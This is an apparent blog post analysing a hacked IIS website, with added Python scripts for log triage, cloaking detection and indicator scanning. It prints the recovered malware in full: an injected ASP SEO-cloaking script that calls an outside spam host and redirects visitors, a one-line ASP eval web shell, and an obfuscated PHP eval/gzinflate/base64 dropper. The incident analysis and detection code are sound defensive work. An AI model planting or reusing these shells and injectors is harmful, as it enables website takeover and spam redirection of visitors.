GoDaddy weirdness / hack?

Saw this in my logs around the time the static content on a website got hacked:

2014-11-24 07:31:33 GET /ts_index.html - 80 184.168.27.80 "aQ0O010O" - 200 6619 123 31 "D:\Hosting\6540401\html\ts_index.html"

The user agent of “aQ0O010O” is a bit weird, and the IP involved is a GoDaddy IP! It is also exactly the user agent the injected ASP script below hard-codes on its own outgoing requests, so this entry is most likely the compromised page fetching the site’s own ts_index.html, which would explain why the client address belongs to the hosting provider.
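As an added example (not from the original post), here is a small Python triage script for IIS W3C-format logs that pulls out exactly this kind of entry: requests carrying the hard-coded user agent, requests from the server’s own addresses, and visitors who hit a spam-marker query string and got bounced. SAMPLE_LOG is constructed; only its first request line mirrors the entry above, the rest are invented filler, and the own_ips set is an assumption you fill in with your own hosting server’s addresses.

```python
"""Triage IIS W3C-format log lines for the suspicious user agent noted above.

Added example (not from the original post). SAMPLE_LOG is constructed: the
first request line mirrors the entry quoted in the post (same UA, IP and
path); the others are invented so the filter has something to ignore and one
spam-link redirect to catch. Field names follow the standard IIS #Fields
header, which is what the parser keys on.
"""
from typing import Dict, FrozenSet, List, Tuple

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) cs(Referer) sc-status sc-bytes cs-bytes time-taken
2014-11-24 07:31:33 GET /ts_index.html - 80 184.168.27.80 aQ0O010O - 200 6619 123 31
2014-11-24 07:31:35 GET /index.asp - 80 203.0.113.7 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - 200 8810 130 47
2014-11-24 07:32:02 GET /index.asp cheap-t-shoes 80 198.51.100.23 Mozilla/5.0+(Windows+NT+6.1)+Firefox/33.0 http://www.google.com/ 302 210 410 12
2014-11-24 07:32:10 GET /about.html - 80 198.51.100.23 Mozilla/5.0+(Windows+NT+6.1)+Firefox/33.0 - 200 4021 330 5
"""

# The user agent the injected ASP script hard-codes on its outgoing requests.
MALWARE_AGENTS = {"aQ0O010O"}
# Query-string markers the script keys on before redirecting a visitor off-site.
REDIRECT_MARKERS = ("-t-", "-b-")

Finding = Tuple[str, str, List[str]]  # (client ip, uri stem, reasons)


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column layout for the lines that follow
            continue
        if not line or line.startswith("#"):
            continue                        # other directives / blank lines
        values = line.split()
        if len(values) != len(fields):
            continue                        # malformed line: skip rather than misalign columns
        rows.append(dict(zip(fields, values)))
    return rows


def flag_suspicious(rows: List[Dict[str, str]],
                    own_ips: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Return the rows that match any of the indicators, with the reasons."""
    findings: List[Finding] = []
    for r in rows:
        reasons: List[str] = []
        if r.get("cs(User-Agent)", "") in MALWARE_AGENTS:
            reasons.append("hard-coded malware user agent")
        if r.get("c-ip") in own_ips:
            # the injected script fetches the site's own ts_index.html, so the
            # server shows up in its own log as a client
            reasons.append("request from one of the server's own addresses")
        query = r.get("cs-uri-query", "")
        if any(m in query for m in REDIRECT_MARKERS) and r.get("sc-status", "").startswith("3"):
            reasons.append("spam-marker query string followed by a redirect")
        if reasons:
            findings.append((r["c-ip"], r["cs-uri-stem"], reasons))
    return findings


if __name__ == "__main__":
    # assumption: 184.168.27.80 is treated here as the hosting server's own address
    for ip, stem, why in flag_suspicious(parse_iis_log(SAMPLE_LOG), frozenset({"184.168.27.80"})):
        print(f"{ip} {stem}: {'; '.join(why)}")
```

Point the parser at the real log file instead of SAMPLE_LOG and it works unchanged, as long as the file carries its #Fields header; GoDaddy’s export adds a physical-path column at the end, which just becomes one more keyed field.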

Anyway, the original hack seems to be some sort of content injection on an ASP page that somehow uploaded files into a /script/ folder (I have yet to work out how).

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%Session.CodePage="65001"%>
<%Response.CodePage="65001"%>

<%
Server.ScriptTimeout=6000

function GetBot()
	dim s_agent 
	GetBot="" 
	s_agent=Request.ServerVariables("HTTP_USER_AGENT") 
	if instr(1,s_agent,"googlebot",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"msnbot",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"slurp",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"baiduspider",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"sohu-search",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"lycos",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"robozilla",1) >0 then 
		GetBot="isBot" 
	end if 
end function 
Public Function GetHtml(url)
	GetHtml = "null"
	Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
	ObjXMLHTTP.Open "GET",url,False
	ObjXMLHTTP.setRequestHeader "User-Agent","aQ0O010O"
	ObjXMLHTTP.send
	GetHtml=ObjXMLHTTP.responseBody
	Set ObjXMLHTTP=Nothing
	set objStream = Server.CreateObject("Adodb.Stream")
	objStream.Type = 1
	objStream.Mode =3
	objStream.Open
	objStream.Write GetHtml
	objStream.Position = 0
	objStream.Type = 2
	objStream.Charset = "utf-8"
	GetHtml = objStream.ReadText
	objStream.Close
End Function

Function GetLocationURL() 
Dim Url 
Dim ServerPort,ServerName,ScriptName,QueryString 
ServerName = Request.ServerVariables("SERVER_NAME") 
ServerPort = Request.ServerVariables("SERVER_PORT") 
ScriptName = Request.ServerVariables("SCRIPT_NAME") 
QueryString = Request.ServerVariables("QUERY_STRING") 
Url="http://"&ServerName 
If ServerPort <> "80" Then Url = Url & ":" & ServerPort 
Url=Url&ScriptName 
If QueryString <>"" Then Url=Url&"?"& QueryString 
GetLocationURL=Url 
End Function 

if GetBot() = "isBot" then
    this_contents = LCase(GetHtml("http://get12.chicstyless.com/domain_get_url_test.php?action=out_put&script_name="&Request.ServerVariables("SCRIPT_NAME")&"&dstring="&Request.ServerVariables("SERVER_NAME")&"&type=asp&do_id="&Request.ServerVariables("QUERY_STRING"))) 
	response.Write(this_contents)
	Response.end()
else
    if instr(Request.ServerVariables("QUERY_STRING"),"-t-") > 0 or instr(Request.ServerVariables("QUERY_STRING"),"-b-") > 0 then
		GetHtml("http://get12.chicstyless.com/51la.php?type=asp&ip="&Request.ServerVariables("REMOTE_ADDR")&"&shell="&Request.ServerVariables("SERVER_NAME"))
		url = "http://get12.chicstyless.com/domain_redirect.php?type=redirect&dstring="&Request.ServerVariables("SERVER_NAME")&"&do_id="&Request.ServerVariables("QUERY_STRING")
		response.redirect url
    else
		oldContent = GetHtml("http://"&Request.ServerVariables("SERVER_NAME")&"/ts_index.html")
		
		response.Write(oldContent)
		
    	Response.end()
    end if
end if
%>

Which, if a search engine crawler visits (judged purely by the user agent), serves whatever get12.chicstyless.com hands back: apparently your own page relayed with spam URLs pointing at your own domain, with -b- and -t- in them, injected at the bottom. A visitor who later arrives via one of those spam URLs is logged to 51la.php and redirected off-site, and everybody else just gets the original ts_index.html:

http://get12.chicstyless.com/domain_get_url_test.php?action=out_put&script_name=/&dstring=ipchicken.com&type=asp&do_id=

Some kind of search engine scamming crap.
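Because the script picks its response purely from the User-Agent and the query string, the cheapest check for this kind of cloaking is to fetch the same URL as a browser and as Googlebot and compare what comes back, then probe with a spam-marker query string to see whether visitors get bounced off-site. The Python below is an added example, not part of the original post: http_fetch is a real fetcher for a host you administer, while simulated_infected_site is a constructed stand-in that mirrors the script’s three branches so the check can run offline (the example.test hostname and the link targets in it are invented).

```python
"""Cloaking check for a site suspected of running the injected ASP above.

Added example, not from the original post. The injected script chooses what
to serve from the User-Agent and the query string alone, so two fetches of
one URL (browser vs. crawler UA) plus one probe with a spam marker in the
query string are enough to expose it. simulated_infected_site is a
constructed stand-in so the check runs without network access.
"""
import difflib
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Tuple

BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"
BOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
LINK_RE = re.compile(r"""href=['"]([^'"]+)['"]""", re.I)

# A fetcher maps (url, user_agent) -> (status, location-or-url, body).
Fetcher = Callable[[str, str], Tuple[int, str, str]]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str, user_agent: str) -> Tuple[int, str, str]:
    """Real fetcher: one GET with the given User-Agent, redirects not followed."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, resp.geturl(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", "replace")
        return err.code, err.headers.get("Location", url), body


def simulated_infected_site(url: str, user_agent: str) -> Tuple[int, str, str]:
    """Constructed stand-in mirroring the injected script's three branches."""
    original = ("<html><body><h1>Example Co</h1>"
                "<a href='/about.html'>About</a></body></html>")
    query = urllib.parse.urlsplit(url).query
    if "googlebot" in user_agent.lower():          # crawler: relayed page plus spam links
        spam = ("<a href='/index.asp?cheap-t-shoes'>cheap shoes</a>"
                "<a href='/index.asp?buy-b-bags'>bags</a>")
        return 200, url, original.replace("</body>", spam + "</body>")
    if "-t-" in query or "-b-" in query:          # visitor via a spam link: bounced off-site
        return 302, "http://get12.chicstyless.com/domain_redirect.php?type=redirect", ""
    return 200, url, original                     # everyone else: the original page


def check_cloaking(url: str, fetch: Fetcher = http_fetch) -> Dict[str, object]:
    """Compare browser vs. crawler views of url and probe the spam-marker redirect."""
    _, _, browser_body = fetch(url, BROWSER_UA)
    _, _, bot_body = fetch(url, BOT_UA)
    browser_links = set(LINK_RE.findall(browser_body))
    bot_links = set(LINK_RE.findall(bot_body))
    similarity = difflib.SequenceMatcher(None, browser_body, bot_body).ratio()

    sep = "&" if "?" in url else "?"
    status, location, _ = fetch(url + sep + "probe-t-probe", BROWSER_UA)
    site_host = urllib.parse.urlsplit(url).netloc
    target_host = urllib.parse.urlsplit(location).netloc if 300 <= status < 400 else ""

    return {
        "similarity": round(similarity, 3),
        "bot_only_links": sorted(bot_links - browser_links),
        "cloaked": similarity < 0.95 or bool(bot_links - browser_links),
        "offsite_redirect": target_host if target_host and target_host != site_host else None,
    }


if __name__ == "__main__":
    print(check_cloaking("http://example.test/index.asp", simulated_infected_site))
```

Against a live host, call check_cloaking with the default fetcher; a clean site should come back with similarity close to 1.0, no bot-only links and no off-site redirect. Links that only the crawler sees are the spam URLs worth grepping for in the rest of the site.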

It seems the original infection was probably done using the following file – PReywT3cNX.asp

<%response.write(now):eval(request(Chr(88)&Chr(88)&Chr(82)&Chr(107)&Chr(121)&Chr(74)&Chr(80)&Chr(119)&Chr(78)&Chr(119)))%>

Which evaluates, as server-side VBScript, whatever is put into the request.querystring or request.form parameter named XXRkyJPwNw (the Chr() chain just spells that name out), i.e. a one-line web shell.

Another file, config.php, was also present, but it was probably unused as the machine was a Windows server:

<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVdHDsTIDfyLL7ahg3KCT8phNMoZe1HOOev1nvUasA8Fokl2CxS6i8XiTPp//O2Pm8D/uEniZ+EfuD9uhPpZ8udjfpb+QfiB+Cv2Zw6J/bXnP3nIf33oXz70l4f+4rj4W/83j/gz9n9rhPr77Rcov4WftoRCnSZE7vCEC/Oft++xNnHWXPVfwFzoFKfYg64BDvtEkjfznuOaUdgPYAjSZASklwlgTvEZsZi+SvpS6NzsUgzEk3Iarw5QTooEdk66T5zEw/fsQvSc/sR7kfRYmE0KQqcBaOYG0pFCu+VZZNAZ5V6ImYiZ4KkewLG+pfXIbOrm9zPo2BnNECtDCKbeihCyBGQr7LtGvgG3OVOGlkgHNE7aEPjtPLlsw25YfB//EyV62o5FIvezIt2R6TtxhdeaGztJk2vwl7lQD1xoQ9vs9Iu6yxq4ydCI3w6y1cn5ZhcIgiM6YiV0Xn4PgmkJPi0IQmpfz+E3veWbL+Q7FcMNc+2A5Xk3K812ZTCuoRnOKr6uyRbZfaFhlK9GBBg9HD7VArWJ3QnWhPFZ5wqszRQlJDCxKlEhQcxdyVM9oavIi+kC2z9jaWDEGXtV892g1si8bgsqftKOBsg+gIr7dRZV7c5UjAFip25Uhep6QIJOvGQzgqGAsSUaVxLAtBP0V6IoCTOwOGbDHNyHxHdN5YycdwpaGJRvZ4NlCbYYukjSisO0hZjyTIyTLwD7XE/4wSL2cqAwAJghpPhCEEZFP8fRnAt1iD3F1Yb7WN4DGHzv7tDBNz5q8y2l/KH6jKMUhDAEeUbEM5IO+lcX2SviKMrHiqRGCsrz4QZO+KRrDMgeuVzVSRPStjxWGrR6e0ARMCV3CUYzW13JYX7NnJMAJd137PVaBGtI7QlyKrUMtHmtfEXrIn6mZOWQoxigQatflCPNOwSdt411t1go09ampoTiCQXT6Fvx9yHU9ooY9TYafkAW9Wio9M3cH5O01Lx7S5X1I9G/HGkydON+s5dZVVaYw/kpCuATfk9j1YpPjneDkWZjoSuCxRMHvWx44MSlWpgHbhh3uV5uuhxhqoDKarTNXvbyKCsPNZFWL1qLsQGmdDoFVwGea29e0c2RyGQvjk8PRKpsApKFOzN9AJ6PBmMfP5feZp7l7dvyY0B4R3N99JjKN/7MQ+V0pkV8vTOZhaYb5GVBZEUQRRozN6RVKo2KgHVyGgR2+oxeogFxN9cvUym5XrIcPlRAy7nCsudzCoh91j5l4YZ2JWOoBJgP8jcz+saM2xEqfDfSKZwk2nTvCM/1DquyQg+/UQ1K91OplZ/NGHCRNv8kE7EGOufKiNLMcQUjB2qkFh5I0zlSt8i7kqk36kn+aJSnisANAU3Im18PPVNeRlhc7W7QxznGGkR/82Sn5pmUGyxtJ72REvn5cuCbk844Qt32ZaNBrmdQazOFituB2/OVlafgLF1/5mlBybEz1sulin3FcWFC0ovaetLnqyRUbX5e1b48BI+aAweNUIUKR3wM8APT6Usma6wtx8s0WTyOnw+HJBnDcT9qgcudEfJH9OhhBvcg9XT2WwubzAMSOrxkangeYRHzA8Pa6mXYdhFQxX8n1q4uETy+pxPeC0QHmc+Kmd0ZLUuW3zzo/Ndo6PjLBFQkrn1vs34mwYB0O+izWBTZ5P5zrHI3YRajU6fny5E1yo7Gs2o3ub63iiI46xJ1N24596Qk40TenLQjDyM/s1s7Bc90VspNSCy7CBiHyGBeeoKApJt+rOCZszntRi17Ul4AL6OkG9+85POIZ6SlwbDLGk+fBR6itEx1r+0OAVhR1MxOzGTJN1q7IPZgQGN3eG99yAYEfIOCx+Bsohn7PIEhKyilnr2bv9RPEKZxJ/OTrmi5sArHrB3xzk6NEpXyiMo4ZlVvxT/Q5YjVsQpjZKBrwZT2uxPIWJ3LtIGygflmb5QWHi1+dErzHFxnEREd2erQh9yul3UGBocA6V37+7l5Q441MIs8R9w36PoCz8fKie/mDmaz+IyZArkKSGUZGgJH561XcXBgNYDgXQidxd9UG3IDVc7JjAAuliUOVy9qzKK8x9t15l5Zx08JZMIODw8jn3fWNgY5Lv1EmZmiQ9MNaO+aIPcNptzzA7gVfSXA6coIge8bGolGqZNAIp9A+m1KaaQFaq3SAf+CMFacq+VoJ3vzcY1spnVDDObh4+NyRn159Wvp+3W0rpv4Ur9YJDnyxm6G0q7lYmFNqztpQliCrnOt7LbOI2u8KvU544L1C/seDLUnwniENJ8IaLD+gFJN2hkEeAmARfZ+rwN/l0RLWhb86W3SJdITnvr0kwZhoiE6FGl4/ZEWCCFzoq9lC8++9ZplWSk/bFLN/aYHbgcnMG+R3AnAOdVMS4Xd1EcQSugdUOzHiXkeC1k8oKQAnTVKhe6i9OwYYDGaY1WSuGuTkZMCQCHtZ7TgiXHE+GeptE9CH+2P5qssVEC5ynOM8247jfKI4NxLY7SoDZWmnnj7NUbd2KfgPotqFXbwHYJGWsYMEPTMXZODm+QePRNHh5dn6qDk7rSGhgaQJCP24Oefqoi+mtd/ugeWPx9Ffn+FnHz0u9DFB0s6HClRibUb/FprdS0AZr+rU7W+pWbFZWxotCUM8kh0HKY0ph06BVu+to4DK5LrpPBIWAchxovkTGrYgK9db06YYtui9bWGzcLWMqMe3svcexqXwment8rUoyanz3OduLrMvNZZt/6KoJSODVVzz9NfAnsR3LLS4ki1FUp4Xke3UfBQAyK80hl2tuT57O8UubD29Q5Oz34Xz9XG+oDDNhkCYXC9QHGXOvUIdL0YCrcFNHlgDeONzfTLWuiedPyoDgHDyynbCS1G3Hjvp2UZhhLywoyZag1EZ6UtJwh5rmSMaDz4g48DEwzga3aqjP9Ftvd2o/6S157KGFIxc9oIpicOejZ6+pA2hy9WlLmjRtjgAPiMnYbXvh6kXmt+HfVnC/HajS/49/vEK+8K75NQZ1AfgXnmwA5jLZJIMTNo7tIA5xv1/aqV1Pex9xBLdKXZSd0VEEDfDx/IwjBw87wTn+u0KRoHhpdQFqqav/UoNCg7noh1fWsxZ9z79G9L/Vxd31/MTTu0OqCVW2yFdqViFzTZqOQiJD/Lu8HsT+erAzZ7CszsrFKevycb5klh4Gbm3+WyMs4jRLuvqDbmZVHAQj1kYxVRpgOrMB4ghD+ByCDF1QXJ7mezmBCjwJ0plbPeLWtaVKASWcsb3Q8zr8BEtoLCF3AqJvDNYAJxCZORzPOtHSgRE8lLX2zl2KpLE7aUpBRf2WTB3SeA7ikn+Ne9Th2En+uWJm+8Z/bOixToqhJ5jWJxEQYcVKxQZEEyKjskMRYlXVzf9jfdWoqjtVEUlHpTgKL7NSadQUPmxVZ1g+GOCgKgYzVCstyN94KE8WYwGWPHfCSesWmg0+bfMTBX50cqlBtgOzz00090zS/gDodYwbnGOejPbB4Kf5hMeGLJ5AqdXxAxY6V2QYKsiohQPoK/b5Lmwm+svXHGkiutIByvFqHglLMRSFYXnBTWgLkOiepZ+vpNaQ9NLue+TaLls71Nuc9NHlyStELiXQFnxK7BdEZx+qmh8CDJHcCX/ExKc9etlddq04Wx2KzKYD2+a4szddn9mFkNvkICg0Qd1PBjj+UmaTy+mmMXUCThVTwQrClflp9T29BKYeqJcvYZ8glBl/NWfZTc/RUtK94kufoFU07ZYinDupGuxz+64MYJAhZDeDDt4LeEwfRmuZXmBCkT35JBtU+Rk0iKVC61QYwSDVgBXt6qQ32If2G9xB+mSZdfp/I+0rYFRHBRnIan80vgyQOG0+Xqv+miblS6jzMkUxUV6h8ua5oGsEolJpxkPtCIhSq7qky53Q4jc0qRyyGllkKnB/U5OR0nkr+gfcZI7QNhA3DUO+Un1t2IwVAdvgU/Zd8N+xRvdaeFlGT4XsK5LQPbJx5FDqh7baZ6ajOHk/iubgs8DjpcQDSTAgBh0CyX+e2E3wpgOgTb6su4gsHea9yydFn+oETd0zCXJrR8qTHZ37BsHVYSIHDP6dHdc8tYqbhuTCr9Ja2tLUTFyHL2QCwo88ZXSxfcmwenhH8TrqvUoIMQwyNtZlVfSGVajTF9egU2AAaJnKbjCv2LUFtfR49o8wjZP6aQs7SvC/eXhtp2RkAnUZs4arvWJUx03J9rS7nKaWBeRn+SIHRMgAIcpq5MQ/2JVUs+egz0OLlNl0r/AL/hGoMIVjeZYMHypCUqLEQt2Osr2rrn9kO833tVYLYWi+TlLa4D4U4JfFG3B70dYpuFHoGc+OwUxPNb8q/I++vwzSgxb4YdRai0Xm8ECzM5vujS/0YpD3wEilVQiFYjrXCi82EnB8nEafjNlyX4G/cx8O9/3Aj9P6Ds3/75r38D'\x29\x29\x29\x3B");
?>
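Both dropper files above rely on the same cheap obfuscation: a chain of Chr() calls in the ASP to hide the parameter name, and \xNN escapes in the PHP to hide eval(gzinflate(base64_decode(...))). The Python below is an added example, not from the original post: it decodes both tricks and scans file contents for the indicators these files and the injected page share (eval over a request parameter, the gzinflate/base64 wrapper, MSXML2.serverXMLHTTP with the hard-coded user agent). SAMPLES is constructed from the snippets above, with the long base64 blob replaced by the placeholder PAYLOAD_PLACEHOLDER and an invented injected.asp fragment.

```python
"""Indicator scan and de-obfuscation for the dropper files described above.

Added example, not from the original post. It flags the patterns those files
show and decodes the two obfuscation tricks they use, VBScript Chr() chains
and PHP \\xNN string escapes, so the hidden parameter name and the wrapped
PHP call become readable. SAMPLES is constructed from the snippets in the
post; the base64 payload is replaced by PAYLOAD_PLACEHOLDER.
"""
import re
from typing import Dict, List

SAMPLES: Dict[str, str] = {
    "PReywT3cNX.asp": (
        "<%response.write(now):eval(request(Chr(88)&Chr(88)&Chr(82)&Chr(107)"
        "&Chr(121)&Chr(74)&Chr(80)&Chr(119)&Chr(78)&Chr(119)))%>"
    ),
    "config.php": (
        r'<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65'
        r"\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'PAYLOAD_PLACEHOLDER'"
        r'\x29\x29\x29\x3B"); ?>'
    ),
    # constructed fragment of the injected page's fetch routine
    "injected.asp": 'Set o=Server.CreateObject("MSXML2.serverXMLHTTP")\n'
                    'o.setRequestHeader "User-Agent","aQ0O010O"',
    "clean.asp": '<% Response.Write "hello" %>',
}

CHR_CHAIN = re.compile(r"(?:Chr\(\d+\)\s*&\s*)+Chr\(\d+\)", re.I)
HEX_ESCAPES = re.compile(r"(?:\\x[0-9A-Fa-f]{2})+")

# (name, pattern) pairs; each is tried on the raw text and on the decoded text
INDICATORS = [
    ("asp-eval-of-request-param", re.compile(r"\beval\s*\(\s*request\s*\(", re.I)),
    ("php-eval-gzinflate-base64", re.compile(r"\beval\s*\(\s*gzinflate\s*\(\s*base64_decode", re.I)),
    ("serverxmlhttp-fetch", re.compile(r"MSXML2\.serverXMLHTTP", re.I)),
    ("known-malware-user-agent", re.compile(r"aQ0O010O")),
    ("chr-chain-obfuscation", CHR_CHAIN),
    ("hex-escape-obfuscation", HEX_ESCAPES),
]


def decode_chr_chain(chain: str) -> str:
    """Chr(88)&Chr(88)&... -> the string those character codes spell."""
    return "".join(chr(int(n)) for n in re.findall(r"Chr\((\d+)\)", chain, re.I))


def decode_hex_escapes(text: str) -> str:
    r"""\x65\x76... -> the bytes those escapes encode, as text."""
    return "".join(chr(int(h, 16)) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", text))


def deobfuscate(source: str) -> str:
    """Replace each Chr() chain with a quoted literal and expand \\xNN runs."""
    source = CHR_CHAIN.sub(lambda m: '"' + decode_chr_chain(m.group(0)) + '"', source)
    return HEX_ESCAPES.sub(lambda m: decode_hex_escapes(m.group(0)), source)


def scan(source: str) -> Dict[str, object]:
    """Indicators hit (raw or decoded), recovered shell parameter names, decoded text."""
    decoded = deobfuscate(source)
    hits = sorted(name for name, rx in INDICATORS if rx.search(source) or rx.search(decoded))
    params: List[str] = re.findall(r'\beval\s*\(\s*request\s*\(\s*"([^"]+)"', decoded, re.I)
    return {"indicators": hits, "shell_params": params, "decoded": decoded}


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        result = scan(content)
        print(f"{name}: {result['indicators'] or 'clean'}", end="")
        print(f"  shell param(s): {result['shell_params']}" if result["shell_params"] else "")
```

Run scan() over every .asp and .php file under the web root; the recovered shell parameter name (XXRkyJPwNw here) is then the thing to grep the IIS logs for, since any request carrying it was someone driving the shell.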
